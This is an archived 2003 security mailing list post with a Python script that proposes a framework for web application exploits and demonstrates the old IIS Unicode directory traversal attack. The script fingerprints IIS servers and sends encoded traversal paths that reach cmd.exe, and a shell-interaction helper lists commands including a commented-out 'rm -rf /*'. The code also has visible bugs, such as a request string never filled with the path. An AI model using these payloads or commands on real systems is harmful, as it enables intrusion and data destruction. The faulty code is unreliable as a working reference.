WebApp Sec mailing list archives
no standards for webapp exploitation
From: ned <nd () felinemenace org>
Date: Wed, 2 Jul 2003 00:21:25 -0700 (PDT)
----- uni.py # i chose unicode because it is still the only # good IIS exploit! oh and it does not work anymore # tooo. #this file incorporates a few modules from # a teeny project of mine. and this is the (1/4) # completed version of the web security module. # there is no standard definition for web based exploits. # VulnXML and the whisker.dat (and all of libwhisker # (whisker RIP)) are for testing purposes ONLY. they # do not scale to enterprise level where API's should # be easy to work with and provide a high level # interface to lower level scripting languages (like # python, perl). variables should be extinct outside # of module classes. the opensource web security community # would benefit from a standardized way to exploit # web applications, wether they are remote code execution, # remote command execution, server and client injection, # remote file reading (all of which are going to be covered # in an independant project which seeks to build webapp # exploit primitives provider on top of the websec class). # feel free to send comments and code to me (nd () felinemenace org # - nd #mwebsec from net import * #from utils import * import sys class websec: def __init__(self): self.tempdata = [] self.port = 0 self.host = "" self.fds = {} self.creds = "" self.reqbuf = "" # return code that is expected after request def expect_return_code(self,codes): found = 0 c = [] f = "" if self.tempdata == []: debug("websec: recieving data") self.tempdata = self.socket.recv(500).split('\n') #debug(self.tempdata) if codes.find(":") != -1: c = codes.split(":") debug("websec: looking for %d different return codes" % len(c)) for x in c: if self.tempdata[0].find(x) != -1: f += x found += 1 else: if self.tempdata[0].find(codes) != -1: debug("websec: %s" % self.tempdata[0]) f = codes found += 1 if found == 0: debug("websec: did not find expected return code(s)") debug("websec: %s" % self.tempdata[0]) return 0 debug("websec: found return code - %s" % f) # return the array as a string return 1 def expect_server(self,type): found = 0 if self.tempdata == []: self.tempdata = self.socket.recv(500).split('\n') for x in self.tempdata: if x.startswith("Server:") or x.startswith("server:"): if x.find(type) != -1: debug("websec: found server type - %s" % type) debug("websec: %s" % x) return 1 else: debug("websec: did not find server type - %s" % type) return 0 def setHost(self,host): self.host = host self.creds = host + ":" def setPort(self,port): self.port = port if self.creds != "": self.creds += "%d" % port def connect(self): debug("connection...") setCredentials(self.host,self.port) self.get_sock() def get_sock(self): self.fds[self.creds] = makeTCPSocket() self.socket = self.fds[self.creds] def addreq(self,data): self.reqbuf += data def sendreq(self): debug("sending data!") self.socket.send(self.reqbuf) def cleartemp(self): self.tempdata = [] def clearreq(self): self.reqbuf = "" def close(self): self.socket.close() #mwebsec #mnet import socket #from utils import * import random # pretty explanatory def setCredentials(h,p): global set,host,port debug("net.py: host is %s" % h) debug("net.py: port is %d" % p) host = h port = p set = 1 def return_set(): return set def meep(): debug("net.py: use setCredentials First!") return def makeTCPSocket(): s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) if set == 1: try: s.connect((host,port)) except socket.error: debug("net.py: Could not connect to %s on %d" % (host,port)) return debug("net.py: tcp socket is ready for reading/writing") return s else: meep() def makeUDPSocket(): socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) if set == 1: try: s.connect((host,port)) except socket.error: debug("net.py: Could not connect to %s on %d" % (host,port)) return debug("net.py: udp socket is ready for reading/writing") return s else: meep() def interact(s): cmd = ["id","uname -a",#"rm -rf /*", "echo \"_|_ this!\""] shell = telnetlib.Telnet() shell.sock = s # random stuff shell.write(cmd[random.randint[len(cmd) - 1]]) shell.interact() return 1 #mnet def debug(data): if set == 1: print data def debug_set(): global set set = 1 # not a great example if __name__ == '__main__': u = [] debug_set() w = websec() w.setHost(sys.argv[1]) w.setPort(80) w.connect() w.addreq("HEAD / HTTP/1.0\r\n\r\n") w.sendreq() if w.expect_server("IIS") != 1: debug("not IIS") sys.exit(0) w.close() w.clearreq() w.cleartemp() # stick this in your pipe and smoke it. u.append("/scripts/..%c0%af../winnt/system32/cmd.exe?/c+") u.append("/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+") u.append("/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+") u.append("/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+") p = 0 for x in u: p += 1 debug("trying %d..." % p) req = "GET %s HTTP/1.0\r\n\r\n" w.clearreq() w.addreq(req) w.connect() w.sendreq() if w.expect_return_code("200") == 1: debug("found unicode bug %d on %h" % sys.arg[1]) w.close() ----- uni.py -- http://felinemenace.org/~nd
Current thread:
- no standards for webapp exploitation ned (Jul 02)
- <Possible follow-ups>
- RE: no standards for webapp exploitation Dawes, Rogan (ZA - Johannesburg) (Jul 02)
- Re: no standards for webapp exploitation Ingo Struck (Jul 02)
- Re: no standards for webapp exploitation dave (Jul 02)